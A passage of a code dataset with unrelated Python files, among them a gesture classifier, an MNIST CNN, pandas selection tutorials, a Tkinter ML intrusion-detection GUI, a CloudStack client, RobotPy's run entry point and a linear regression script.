time_taken\n\n    def obtain_classifier(self, classifier_type, pickle_file, train_subject, feature_set, gesture_set):\n        trainer = None\n        # Obtain classifier type\n        if lower(classifier_type) == 'nn':\n            # Get set hyper parameters\n            activation = pickle_file.split(\".\")[0].split(\"--\")[1].split(\"_\")[1]\n            # Get NN Trainer\n            trainer = NN_Trainer(subject_name=train_subject, feature_type=feature_set, activation=activation,\n                                 gesture_set=gesture_set)\n            trainer.load(pickle_name=pickle_file)\n            pass\n        elif lower(classifier_type) == 'svm':\n            # Get set hyper parameters\n            kernel_type = pickle_file.split(\".\")[0].split(\"--\")[1].split(\"_\")[1]\n            # Get SVM Trainer\n            trainer = SVM_Trainer(subject_name=train_subject, feature_type=feature_set, kernel_type=kernel_type,\n                                  gesture_set=gesture_set)\n            trainer.load(pickle_name=pickle_file)\n        elif lower(classifier_type) == 'dt':\n            # Get set hyper parameters\n            criterion_type = pickle_file.split(\".\")[0].split(\"--\")[1].split(\"_\")[1]\n            # Get NN Trainer\n            trainer = DT_Trainer(subject_name=train_subject, feature_type=feature_set, criterion_type=criterion_type,\n                                 gesture_set=gesture_set)\n            trainer.load(pickle_name=pickle_file)\n\n        return trainer\n\n    def process_modified_test_results(self, comparison_subject, test_subject, classifier_type, correct_classification,\n                                      time_list, trainer,\n                                      gesture_set, feature_set, file_name, file_path, unseen_data,\n                                      verbose=False):\n        # Calculate average time taken to perform classification algorithms between multiple test hand instances\n        avg_time = (sum(time_list)) / (len(time_list))\n        # Calculate average accuracy of classification algorithm between multiple test hand instances\n        accuracy = round(100.0 * (float(correct_classification) / (float(len(time_list)))), 2)\n\n        train_accuracy = round(trainer.training_acc * 100.0, 3)\n\n        # Get pickle file name without folders\n        pickle_file = file_path.split(\"\\\\\")[-1].split(\".\")[0]\n        unseen_data = unseen_data.split(\"\\\\\")[-1].split(\".\")[0]\n        if test_subject == comparison_subject:\n            title = \"PERSONALIZED TEST\"\n        else:\n            title = \"NON-PERSONALIZED TEST\"\n\n        summary = \"\"\"\n\n__________________________________________________________________________________________________\nTest Subject Pickle : %s \nUnseen Subject Data : %s\n__________________________________________________________________________________________________\n            %s  \n--------------------------------------------------------------------------------------------------\n    Subject        : %s\n    Unseen Subject : %s\n    Feature        : %s\n    Gesture Set    : %s\n    Correct        : %s\n    Incorrect      : %s\n    Result         : %s / %s\n    Avg Time       : %s seconds\n    \n    TRAINING   \n    Accuracy   : %s %%\n    \n    TESTING\n    Accuracy   : %s %%\n    \n    \\n\"\"\" % (pickle_file,\n             unseen_data,\n             title,\n             test_subject,\n             comparison_subject,\n             feature_set,\n             gesture_set,\n             str(correct_classification),\n             str(len(time_list) - correct_classification),\n             str(correct_classification),\n             str(len(time_list)),\n             str(avg_time),\n             str(train_accuracy),\n             str(accuracy),\n             )\n\n        # Print out results in summary form\n        if verbose is True:\n            print(summary)\n            pass\n        # Save summary onto report file\n        return io.save_report(subject_name=test_subject, gesture_set=gesture_set, feature_set=feature_set,\n                              report_header='classification', classifier_type=classifier_type, line=summary,\n                              file_name=file_name)\n","sub_path":"src/controller/LeapDataClassifier.py","file_name":"LeapDataClassifier.py","file_ext":"py","file_size_in_byte":10921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"426010015","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"使用CNN对MNIST数据集进行分类\n\n@author: winton \n@time: 2017-10-26 16:43 \n\"\"\"\nimport os\nimport sys\n\nimport gflags\n\nimport photinia\nimport tensorflow as tf\n\nfrom examples import mnist\n\n\nclass Model(photinia.Model):\n    \"\"\"模型定义\n    \"\"\"\n\n    def __init__(self,\n                 name,\n                 session,\n                 height,\n                 width,\n                 depth,\n                 feature_size,\n                 num_classes):\n        \"\"\"模型初始化\n\n        :param name: 模型名\n        :param session: 使用的tensorflow会话\n        :param height: 图片高度\n        :param width: 图片宽度\n        :param depth: 图片通道数\n        :param feature_size: 全连接层输出维度\n        :param num_classes: 类别数\n        \"\"\"\n        self._height = height\n        self._width = width\n        self._depth = depth\n        self._feature_size = feature_size\n        self._num_classes = num_classes\n        super().__init__(name, session)\n\n    def _build(self):\n        # 网络模块定义 --- build\n        self._cnn = photinia.CNN('CNN',\n                                 input_height=self._height,\n                                 input_width=self._width,\n                                 input_depth=1,\n                                 layer_shapes=[(5, 5, 32, 2, 2),\n                                               (5, 5, 64, 2, 2)],\n                                 activation=tf.nn.relu,\n                                 with_batch_norm=False\n                                 ).build()\n        self._lin1 = photinia.Linear('LINEAR1', self._cnn.flat_size, self._feature_size)\n        self._lin2 = photinia.Linear('LINEAR2', self._feature_size, self._num_classes)\n        # dropout参数\n        keep_prob = tf.placeholder(dtype=photinia.dtype)\n        # 输入\n        x = tf.placeholder(dtype=photinia.dtype, shape=[None, self._height, self._width, self._depth])\n        y_ = tf.placeholder(dtype=photinia.dtype, shape=[None, self._num_classes])\n        # 网络结构定义 --- setup\n        y = self._cnn.setup(x)\n        y = self._lin1.setup(y)\n        y = tf.nn.dropout(y, keep_prob)\n        y = self._lin2.setup(y)\n        # 损失函数定义, softmax交叉熵函数\n        loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_, logits=y))\n        # accuracy计算\n        correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))\n        accuracy = tf.reduce_mean(tf.cast(correct_prediction, photinia.dtype))\n        # 设置训练和预测的slot\n        self._add_slot(\n            'train',\n            outputs=(loss, accuracy),\n            inputs=(x, y_, keep_prob),\n            updates=tf.train.AdamOptimizer(1e-4).minimize(loss)\n        )\n        self._add_slot(\n            'predict',\n            outputs=accuracy,\n            inputs=(x, y_, keep_prob)\n        )\n\n\ndef main(flags):\n    # 创建数据源对象\n    ds = mnist.Data(flags.directory)\n    # tensorflow 配置\n    config = tf.ConfigProto()\n    config.gpu_options.allow_growth = True\n    # 开始session\n    with tf.Session(config=config) as session:\n        # 创建模型对象\n        model = Model('Model',\n                      session,\n                      flags.height,\n                      flags.width,\n                      flags.depth,\n                      flags.feature_size,\n                      flags.num_classes)\n        # 获取slot\n        train = model.get_slot('train')\n        predict = model.get_slot('predict')\n        # 参数初始化\n        session.run(tf.global_variables_initializer())\n        # 开始训练\n        for i in range(1, flags.nloop + 1):\n            # 获取一个batch的数据\n            images_batch, labels_batch = ds.next_batch(flags.bsize)\n            loss, train_accuracy = train(images_batch, labels_batch, 0.5)\n            # 每100次迭代输出训练交叉熵损失以batch上的accuracy\n            if i % 100 == 0:\n                print('Loop {}:\\tloss={}\\ttrain accuracy={}'.format(i, loss, train_accuracy))\n        # 输出在测试集上的accuracy\n        accuracy = predict(ds.test_images, ds.test_labels, 1.0)\n        print('Accuracy on test set: {}'.format(accuracy))\n    return 0\n\n\nif __name__ == '__main__':\n    global_flags = gflags.FLAGS\n    gflags.DEFINE_boolean('help', False, 'Show this help.')\n    gflags.DEFINE_string('gpu', '0', 'Which GPU to use.')\n    gflags.DEFINE_string('directory', './examples', 'Folder to save the origin data.')\n    gflags.DEFINE_integer('height', 28, 'Height of image.')\n    gflags.DEFINE_integer('width', 28, 'Width of image.')\n    gflags.DEFINE_integer('depth', 1, 'Depth of image.')\n    gflags.DEFINE_integer('feature_size', 1024, 'Output dimension of fully-connected layer .')\n    gflags.DEFINE_integer('num_classes', 10, 'Number of classes.')\n    gflags.DEFINE_integer('nloop', 20000, 'Number of loops.')\n    gflags.DEFINE_integer('bsize', 50, 'Batch size.')\n    global_flags(sys.argv)\n    if global_flags.help:\n        print(global_flags.main_module_help())\n        exit(0)\n    os.environ['CUDA_VISIBLE_DEVICES'] = global_flags.gpu\n    exit(main(global_flags))\n","sub_path":"examples/mnist_deep.py","file_name":"mnist_deep.py","file_ext":"py","file_size_in_byte":5174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"194605771","text":"\"\"\"\nPE19 Mamy listę moja_lista = [-2, 4, -1, 66, 5, 0, -1]\nchcemy mieć nową listę\ntaką, że jeśli element jest mniejszy niż 0 to dodamy do niego 5\na jeśli jest większy równy 0 to dodamy do niego 100\n\"\"\"\n\nmoja_lista = [-2, 4, -1, 66, 5, 0, -1]\n\nnowa_lista = [x + 5 if x < 0 else x + 100 for x in moja_lista]\n\nprint(nowa_lista)\n","sub_path":"a/petle_listy/PE19.py","file_name":"PE19.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"310610841","text":"import os\n\n# 站点URL\nURL = 'http://www.peersafe.cn/index.html'\n\n# headers\nHEADERS = {\n    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36'\n}\n\n# 存储主目录\nSAVE_PATH = os.path.join(os.path.abspath('.'), 'StaticHTML')\n\n# 解析url正则\nREG_URL = r'^(https?://|//)?((?:[a-zA-Z0-9-_]+\\.)+(?:[a-zA-Z0-9-_:]+))((?:/[-_.a-zA-Z0-9]*?)*)((?<=/)[-a-zA-Z0-9]+(?:\\.([a-zA-Z0-9]+))+)?((?:\\?[a-zA-Z0-9%&=]*)*)$'\n\n# 解析url类型\nREG_RESOURCE_TYPE = r'(?:href|src|data\\-original|data\\-src)=[\"\\'](.+?\\.(?:js|css|jpg|jpeg|png|gif|svg|ico|ttf|woff2))[a-zA-Z0-9\\?\\=\\.]*[\"\\']'\n\n# 图片格式\nIMG_TYPE_ARR = ['jpg', 'png', 'ico', 'gif', 'jpeg', 'svg']\n\n# 下载文件地址列表\nDOWNLOAD_LIST = []","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"217591632","text":"import sniffer\nimport modifier\nimport pickle\nimport sklearn\nimport pandas as pd\nfrom sklearn import svm\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nfrom sklearn import metrics\nfrom tkinter import *\n# ML Model training code\n'''\ndf = pd.read_csv(r'allAttack0.csv',header=None)\ndf[0:5]\ndf[14]=df[13]\ndf[14]=1\n#df[14].unique()\n\ndf1 = pd.read_csv(r'normal3.csv',header=None)\ndf1[0:5]\ndf1[14]=df1[13]\ndf1[14]=0\n#df1[14].unique()\n\n\n\nframes=[df,df1]\ndataset=pd.concat(frames)\n\ndataset.replace('?',-9999,inplace=True)\nX=dataset.drop([0,1,14],axis=\"columns\")\ny=np.array(dataset[14])\n\nX_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.25)\nclf=svm.SVC()\nclf.fit(X_train,y_train)\ny_pred=clf.predict(X_test)\n\nprint(\"Accuracy\",metrics.accuracy_score(y_test,y_pred))\n#print(results)\n\n#Saving model\nfilename=\"microdatasetmodel.sav\"\npickle.dump(clf,open(filename,'wb'))\n'''\n\n# list of table heads\nlst = ['sip ', 'dip ', 'tcpCount', 'tcpSportCount', 'tcpDportCount', 'tcp_fin', 'tcpSyn', 'tcpPush', 'tcpAck',\n       'tcpUrg', 'udpCount', 'udpSport', 'udpDport', 'icmp count', 'Type']\n\n# Global Status Flag\nflag = 0\n\n# Globally Loading Machine Learning Model\nfilename = \"microdatasetmodel.sav\"\nload_picklemodel = pickle.load(open(filename, 'rb'))\n\n# Tkinter Start Button code\ndef start():\n    print(\"Giving Flag to IDS\")\n    global flag\n    flag = True\n\n\n# Tkinter recursive loop code\ndef StartIDS():\n\n    #Delete previous Entries before new loop\n    print(len(tableFrame.winfo_children()))\n    if len(tableFrame.winfo_children()):\n        for i in tableFrame.winfo_children():\n            i.destroy()\n\n    #Displaying Table Heads\n    for heads in range(len(lst)):\n        e = Entry(tableFrame,width=len(lst[heads]))\n        e.grid(row=0, column=heads, padx=0, pady=0)\n        e.insert(END,lst[heads])\n\n    # Run when Start is pressed i.e flag is True\n    if flag:\n        # Starting sniffer\n        df = sniffer.sniff()\n        # modifier.modify()\n\n        # Pickle programn\n        if len(df) > 0:\n            df = df.fillna(value=np.nan)\n            df = df.replace(np.nan, int(0))\n            temp = df\n            temp = temp.drop(['sip', 'dip'], axis=1)\n            result = load_picklemodel.predict(temp)\n\n            # output dataframe for GUI\n            df[14] = result  # appending ML results to dataframe\n\n            # table creation\n            # total number of rows and columns in list\n            total_columns = 15\n            total_rows = len(df.index)\n            print(total_rows)\n            for i in range(total_rows):\n                if df.iat[i,14]==1:\n                    for j in range(total_columns):\n                        e = Entry(tableFrame,bg=\"Red\",width=len(lst[j]))\n                        e.grid(row=i + 2, column=j, padx=0, pady=0)\n                        e.insert(END, df.iat[i, j])\n                else:\n                    for j in range(total_columns):\n                        e = Entry(tableFrame, width=len(lst[j]))\n                        e.grid(row=i + 2, column=j, padx=0, pady=0)\n                        e.insert(END, df.iat[i, j])\n    root.after(3000,StartIDS)\n\n# Tkinter Stop Button Code\ndef stop():\n    print(\"Stopping IDS\")\n    global flag\n    flag = 0\n\n# Close button program\ndef close():\n    print(\"Closing program\")\n    root.destroy()\n\n\nroot = Tk()\nroot.geometry(\"1280x720\")\nroot.title(\"MLIDS\")\n\ncontrolFrame = Frame(root)\ncontrolFrame.grid(row=0,column=0, padx=5, pady=0)\n\nstartButton = Button(controlFrame, text=\"Start\", command=start)\nstartButton.grid(row=0, column=0, padx=0, pady=5)\n\nstopButton = Button(controlFrame, text=\"Stop\", command=stop)\nstopButton.grid(row=1, column=0, padx=0, pady=5)\n\ncloseButton = Button(controlFrame, text=\"Close\", command=close)\ncloseButton.grid(row=2, column=0, padx=0, pady=5)\n\ntableFrame = Frame(root)\ntableFrame.grid(row=0,column=1)\n\nroot.after(3000,StartIDS)\n\nroot.mainloop()\n\n","sub_path":"MLIDS.py","file_name":"MLIDS.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"53047458","text":"from Client import Client\n\n\nclass ExtendedClient(Client):\n    '''\n    This is designed to work with the CloudStack API extension which can be\n    found at https://github.com/jasonhancock/cloudstack-api-extension\n    '''\n\n    def getUserData(self, args={}):\n        if 'id' not in args:\n            raise RuntimeError(\"Missing required argument 'id'\")\n\n        return self.request('getUserData', args)\n\n    def listBundles(self, args={}):\n        return self.request('listBundles', args)\n\n    def deployBundle(self, args={}):\n        if 'bundle' not in args:\n            raise RuntimeError(\"Missing required argument 'bundle'\")\n\n        return self.request('bundle', args)\n\n    def listVPCs(self, args={}):\n        return self.request('listVPCs', args)\n\n    def createVPC(self, args={}):\n        if 'cidr' not in args:\n            raise RuntimeError(\"Missing required argument 'cidr'\")\n        if 'displaytext' not in args:\n            raise RuntimeError(\"Missing required argument 'displaytext'\")\n        if 'name' not in args:\n            raise RuntimeError(\"Missing required argument 'name'\")\n        if 'vpcofferingid' not in args:\n            raise RuntimeError(\"Missing required argument 'vpcofferingid'\")\n        if 'zoneid' not in args:\n            raise RuntimeError(\"Missing required argument 'zoneid'\")\n        return self.request('createVPC', args)\n\n    def deleteVPC(self, args={}):\n        if 'id' not in args:\n            raise RuntimeError(\"Missing required argument 'id'\")\n        return self.request('deleteVPC', args)\n","sub_path":"CloudStackClient/ExtendedClient.py","file_name":"ExtendedClient.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"358755967","text":"import pandas as pd\nimport numpy as np\n\ndef testBase():\n    dates = pd.date_range('20200217', periods=6)\n    df = pd.DataFrame(np.arange(24).reshape((6, 4)), index=dates, columns=['A', 'B', 'C', 'D'])\n    '''\n                 A   B   C   D\n    2020-02-17   0   1   2   3\n    2020-02-18   4   5   6   7\n    2020-02-19   8   9  10  11\n    2020-02-20  12  13  14  15\n    2020-02-21  16  17  18  19\n    2020-02-22  20  21  22  23\n    '''\n    df.to_csv('./data/first.csv')\n\n    # 获取某行\n    # 见下面通过切片获取和通过标签获取\n    df['20200218':'20200218']  # 含首也含尾\n    # A B C D\n    # 2020-02-18 4 5 6 7\n    df[1:2]  # 含首不含尾\n    # A B C D\n    # 2020-02-18 4 5 6 7\n\n\n    # 获取某列\n    df['A']\n    # 或\n    df.A\n    '''\n    2020-02-17 0\n    2020-02-18 4\n    2020-02-19 8\n    2020-02-20 12\n    2020-02-21 16\n    2020-02-22 20\n    Freq: D, Name: A, dtype: int32\n    '''\n\n    # print(df['20200218']),这样取一行报错!!!\n    df['A']['20200218']  # 先列后行来定位一个元素\n    # 4\n\n    # 对行进行切片\n    ## 按数字索引\n    print(df[0:3])  # 含首不含尾\n    '''\n    A B C D\n    2020-02-17 0 1 2 3\n    2020-02-18 4 5 6 7\n    2020-02-19 8 9 10 11\n    '''\n\n    ## 按索引名称\n    print(df['20200217':'20200219'])  # 含首也含尾\n    '''\n    A B C D\n    2020-02-17 0 1 2 3\n    2020-02-18 4 5 6 7\n    2020-02-19 8 9 10 11\n    '''\n\n    # 获取索引名称(loc)获取Dataframe子数据\n    ## 取某一行(只能传一行)\n    print(df.loc['20200218'])\n    '''\n    A 4\n    B 5\n    C 6\n    D 7\n    Name: 2020-02-18 00:00:00, dtype: int32\n    '''\n\n    ## 取某行的若干个属性(列)\n    print(df.loc['20200218', ['A', 'C', 'D']])\n    '''\n    A 4\n    C 6\n    D 7\n    Name: 2020-02-18 00:00:00, dtype: int32\n    '''\n\n    ## 获取所有行的若干属性(列)\n    print(df.loc[:,['A','B']])\n    # A B\n    # 2020-02-17 0 1\n    # 2020-02-18 4 5\n    # 2020-02-19 8 9\n    # 2020-02-20 12 13\n    # 2020-02-21 16 17\n    # 2020-02-22 20 21\n\n\n    # 获取序数索引(iloc)获取Dataframe子数据\n    print(df.iloc[3,1])  # 获取索引行3列1的值\n    # 13\n    print('-------------------------------------------')\n    print(df.iloc[3:5,1:3])\n    # 含首不含尾,其中单一个冒号(:)表示去这一维的所有;-1表示这一维的最后一项;(:3)表示从0到3;(3:)表示从3到最后一项(含)\n    '''\n    B C\n    2020-02-20 13 14\n    2020-02-21 17 18\n    '''\n\n    # 离散切取\n    print(df.iloc[[1,3,5],1:3])\n    '''\n    B C\n    2020-02-18 5 6\n    2020-02-20 13 14\n    2020-02-22 21 22\n    '''\n\n    # 还可以通过删选切取\n    print(df[df.A>8])\n    '''\n    A B C D\n    2020-02-20 12 13 14 15\n    2020-02-21 16 17 18 19\n    2020-02-22 20 21 22 23\n    '''\n\ndef chooseCol():\n    dates = pd.date_range('20200217', periods=6)\n    df = pd.DataFrame(np.arange(-12, 12).reshape((6, 4)), index=dates, columns=['A', 'B', 'C', 'D'])\n    print(df)\n\n    cols = ['B', 'C']\n    res = df[cols]\n    print(res)\n\n\ndef testNumIndex():\n    dates = pd.date_range('20200217', periods=6)\n    df = pd.DataFrame(np.arange(24).reshape((6, 4)), index=dates, columns=['A', 'B', 'C', 'D'])\n    '''\n    A B C D\n    2020-02-17 0 1 2 3\n    2020-02-18 4 5 6 7\n    2020-02-19 8 9 10 11\n    2020-02-20 12 13 14 15\n    2020-02-21 16 17 18 19\n    2020-02-22 20 21 22 23\n    '''\n    df.to_csv('./data/first.csv')\n\n    # 获取某行\n    # 见下面通过切片获取和通过标签获取\n    print(df['20200218':'20200218'])  # 含首也含尾\n    # A B C D\n    # 2020-02-18 4 5 6 7\n\n    print(df[-2:])  # 含首不含尾,id为1的行\n\n\n\ndef testFromLoad():\n    df = pd.read_csv('./data/first.csv', index_col=0)\n    # for dfi in df.iteritems():  # 按行遍历\n    #     print(dfi)\n\n    # for dfi in df.iterrows():  # 按列遍历\n    #     print(dfi)  # 结果是一个tuple\n\n    for dfi in df.itertuples():  # 按列遍历\n        print(getattr(dfi, 'A'))  # 结果是一个pandas的对象,列被封装成了属性\n        print(type(dfi))\n\n    # for i in range(df.shape[0]):\n    #     print(df.iloc[i,:])  # 结果是\n    #     print(df.iloc[i,:]['A'])\n\ndef train():\n    df = pd.read_csv('./data/first.csv', index_col=0)\n    print(df)\n    data = df.iloc[:,:-1].values\n    print(data)\n\ndef t01test():\n    dates = pd.date_range('20200217', periods=6)\n    df = pd.DataFrame(np.arange(-12,12).reshape((6, 4)), index=dates, columns=['A', 'B', 'C', 'D'])\n    print(df[df.A>3])\n\n    # df.loc[df['color'] == 'blue', 'height'] = 175\n\n    print(df.values)  # 中间内容的二维表,np.array\n\n    print(df.loc[:, (df==False).any(axis=0)])  # 找到存在0的列\n\ndef testAllAny():\n    # 找到全0的列、存在0的列\n    # 干掉全0的列、存在0的列\n    dates = pd.date_range('20200217', periods=6)\n    df = pd.DataFrame(np.arange(-12, 12).reshape((6, 4)), index=dates, columns=['A', 'B', 'C', 'D'])\n\n    # all/any中axis是跟维度是对应的\n    # df.loc[:, (df == 0).any(axis=0)] 这算是找第二维度,即列,那我需要any每一行?emm,先这么理解\n\n    # 找到存在0的列\n    print(df.loc[:, (df == 0).any(axis=0)])  # 找到存在0的列\n    # 取反,找到不存在0的列\n    print(df.loc[:, ~((df == 0).any())])\n    # 换一下方式:用all,找到全不是0的\n    print(df.loc[:, ((df != 0).all())])\n    # 再取反,就是找存在0的\n    print(df.loc[:, ((df != 0).all())])\n\n    # 如果是行呢\n    print(df.loc[(df == 0).any(axis=1), :])  # 找到存在0的列\n\ndef testDropNan():\n    dates = pd.date_range('20200217', periods=6)\n    df = pd.DataFrame(np.arange(-12, 12).reshape((6, 4)), index=dates, columns=['A', 'B', 'C', 'D'])\n    df = df.replace(0, pd.NA)\n    print(df)\n    df.dropna(axis=0, how='all', inplace=True)\n    # axis:0 删除行;1 删除列\n    # how:any 存在就删除;all 全Na才删除\n    # inplace: False: 返回新的数据集(默认)True: 在愿数据集上操作\n    print(df)\n\ndef testColFase():\n    dates = pd.date_range('20200217', periods=6)\n    df = pd.DataFrame(np.arange(-12, 12).reshape((6, 4)), index=dates, columns=['A', 'B', 'C', 'D'])\n    df = df.replace(-4, False)\n    df = df.replace(4, pd.NA)\n    df.to_csv('./data/testcolfalse.csv')\n    print(df)\n\n    res = df[df['A']==False]  # 那些类False也会被选中,如果没对比,为空。。。;NaN不会被识别为False\n    print(res)\n\n    df2 = pd.read_csv('/Users/darcyzhang/Downloads/D_Chrome/image-diff_persistence/tasks/tasks.csv')\n    print(df2)\n    res = df2[df2['etime'] == False]  # 那些类False也会被选中,如果没对比,为空。。。\n    print(res)\n\nif __name__ == '__main__':\n    chooseCol()\n    # testColFase()\n    # testDropNan()\n    # testNumIndex()\n    # train()\n    # testFromLoad()\n    # testBase()\n","sub_path":"tools/Pandaspd/t02datachoose.py","file_name":"t02datachoose.py","file_ext":"py","file_size_in_byte":7200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"87064323","text":"# novalidate\n\nimport argparse\nimport inspect\nimport sys\n\nfrom os.path import exists\nfrom pkg_resources import iter_entry_points\n\nfrom .logconfig import configure_logging\nimport hal_impl\n\ndef _log_versions():\n    import wpilib\n    import hal\n    import hal_impl\n\n    import logging\n    logger = logging.getLogger('wpilib')\n\n    logger.info(\"WPILib version %s\", wpilib.__version__)\n    logger.info(\"HAL base version %s; %s platform version %s\",\n                hal.__version__,\n                hal_impl.__halplatform__,\n                hal_impl.__version__)\n    if hasattr(hal_impl.version, \"__hal_version__\"):\n        logger.info(\"HAL library version %s\", hal_impl.version.__hal_version__)\n\n    # should we just die here?\n    if hal.__version__ != wpilib.__version__ and \\\n       hal.__version__ != hal_impl.__version__:\n        logger.warning(\"Core component versions are not identical! This is not a supported configuration, and you may run into errors!\")\n\n    if hal.isSimulation():\n        logger.info(\"Running with simulated HAL.\")\n\n        # check to see if we're on a RoboRIO\n        # NOTE: may have false positives, but it should work well enough\n        if exists('/etc/natinst/share/scs_imagemetadata.ini'):\n            logger.warning(\"Running simulation HAL on actual roboRIO! This probably isn't what you want, and will probably cause difficult-to-debug issues!\")\n\n    # Log third party versions\n    # -> TODO: in the future, expand 3rd party HAL support here?\n    for entry_point in iter_entry_points(group='robotpylib', name=None):\n        # Don't actually load the entry points -- just print the\n        # packages unless we need to load them\n        dist = entry_point.dist\n        logger.info(\"%s version %s\", dist.project_name, dist.version)\n\nclass _CustomHelpAction(argparse.Action):\n\n    def __init__(self,\n                 option_strings,\n                 dest=argparse.SUPPRESS,\n                 default=argparse.SUPPRESS,\n                 help=None):\n        super(_CustomHelpAction, self).__init__(\n            option_strings=option_strings,\n            dest=dest,\n            default=default,\n            nargs=0,\n            help=help)\n\n    def __call__(self, parser, namespace, values, option_string=None):\n        parser.print_help()\n        parser.exit(1)  # argparse uses an exit code of zero by default\n\nargparse._HelpAction = _CustomHelpAction\n\ndef run(robot_class, **kwargs):\n    '''\n    This function gets called in robot.py like so::\n\n        if __name__ == '__main__':\n            wpilib.run(MyRobot)\n\n    This function loads available entry points, parses arguments, and\n    sets things up specific to RobotPy so that the robot can run. This\n    function is used whether the code is running on the roboRIO or\n    a simulation.\n\n    :param robot_class: A class that inherits from :class:`.RobotBase`\n    :param **kwargs: Keyword arguments that will be passed to the executed entry points\n    :returns: This function should never return\n    '''\n\n    # sanity check\n    if not hasattr(robot_class, 'main'):\n        print(\"ERROR: run() must be passed a robot class that inherits from RobotBase (or IterativeBase/SampleBase)\")\n        exit(1)\n\n    parser = argparse.ArgumentParser()\n    subparser = parser.add_subparsers(dest='command', help=\"commands\")\n    subparser.required = True\n\n    parser.add_argument('-v', '--verbose', action='store_true', default=False,\n                        help=\"Enable debug logging\")\n\n    parser.add_argument('--ignore-plugin-errors', action='store_true', default=False,\n                        help=\"Ignore errors caused by RobotPy plugins (probably should fix or replace instead!)\")\n\n    has_cmd = False\n\n    for entry_point in iter_entry_points(group='robotpy', name=None):\n        try:\n            cmd_class = entry_point.load()\n        except ImportError:\n            if '--ignore-plugin-errors' in sys.argv:\n                print(\"WARNING: Ignoring error in '%s'\" % entry_point)\n                continue\n            else:\n                print(\"Plugin error detected in '%s' (use --ignore-plugin-errors to ignore this)\" % entry_point)\n                raise\n\n        cmdparser = subparser.add_parser(entry_point.name, help=inspect.getdoc(cmd_class))\n        obj = cmd_class(cmdparser)\n        cmdparser.set_defaults(cmdobj=obj)\n        has_cmd = True\n\n    if not has_cmd:\n        parser.error(\"No entry points defined -- robot code can't do anything. Install packages to add entry points (see README)\")\n        exit(1)\n\n    options = parser.parse_args()\n\n    configure_logging(options.verbose)\n\n    _log_versions()\n    retval = options.cmdobj.run(options, robot_class, **kwargs)\n\n    if retval is None:\n        retval = 0\n    elif retval is True:\n        retval = 0\n    elif retval is False:\n        retval = 1\n\n    exit(retval)\n","sub_path":"env/lib/python3.6/site-packages/wpilib/_impl/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"406554643","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nimport sys\n\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\ndef import_dataset(filename):\n    with open(filename) as binary_file:\n        data = []\n        x = []\n        y = []\n        z = []\n        for d in binary_file:\n            string = d.split()\n            x.append(float(string[0]))\n            y.append(float(string[1]))\n            z.append(float(string[2]))\n        \n        array = np.ndarray(shape=(len(x), 3), dtype=float)\n\n        for i in range(len(x)):\n            array[i][0] = x[i]\n            array[i][1] = y[i]\n            array[i][2] = z[i]\n\n        return array\n\nkick1 = import_dataset('kick1.dat')\n# kick2 = import_dataset('kick2.dat')\n\n# print(kick1)\n\n# fig = plt.figure()\n\n# ax = fig.add_subplot(111, projection='3d')\n# ax.scatter(kick1[:,0], kick1[:,1], kick1[:,2])  # plot the point (2,3,4) on the figure\n\n# plt.show()\n\ndef regressaoLinear(X, Y, iterations, learning_rate, W_scale = 0.05):\n    print(X.shape)\n    n = X.shape[1]\n    m = X.shape[0]\n\n    W = np.random.rand(1,n+1)*W_scale    \n    print(\"Init W: \", W)    \n    \n    costs = []\n    for it in range(0,iterations):\n        W, j = gradient_desc(W,X,Y,m,n,learning_rate)\n        costs.append(j)\n\n    plotGrafico(W,X,Y,costs,iterations)\n    \n\ndef plotGrafico(W,X,Y,costs,iterations):\n    h = calc_h(W, X)\n    fig = plt.figure()\n\n    ax = fig.add_subplot(111, projection='3d')\n    ax.scatter(X[:,0], X[:,1], Y[:]) \n    ax.scatter(X[:,0], X[:,1], h)\n\n    i = 2\n    y = 1.109 - 0.050\n    x = -1.192 - 0.050\n    z = 1.11 - 0.01\n    predX1 = []\n    predX2 = []\n    predH = []\n    while y > 0:\n        y = 1.109 - i*0.050\n        x = -1.192 - i*0.050\n        z = 1.11 - i*0.01\n        h = calc_h(W,np.asarray([[x, y]]))\n        predX1.append(x)\n        predX2.append(y)\n        # h = calc_h(W,np.asarray([[y, z]]))\n        # predX1.append(y)\n        # predX2.append(z)\n        # h = calc_h(W,np.asarray([[x, z]]))\n        # predX1.append(x)\n        # predX2.append(z)\n\n        predH.append(h)\n        i+=1\n\n    ax.scatter(predX1[:], predX2[:], predH[:])  # plot the point (2,3,4) on the figure\n    plt.show()\n\n    plt.plot(range(0,iterations),costs[:])\n    plt.show()\n    \n\ndef cost(h, Y):\n    m = Y.shape[0]\n    j = (1/(2*m))*np.sum((h-Y)**2)\n    return j\n\ndef calc_h(W, X):\n    m = X.shape[0]\n    h = np.dot(W[0,1:],X.T).reshape((m, 1))+W[0,0]\n    return h\n\ndef gradient_desc(W,X,Y,m,n,learning_rate):\n    h = calc_h(W,X)\n    # print(h.shape)\n    # print(h)\n    j = cost(h, Y)\n    print(\"cost: \",j)\n\n    grads = {}\n    grads[\"dw0\"] = (1/m)*np.sum((h-Y))\n    for i in range(1,n+1):\n        grads[\"dw\"+str(i)] = 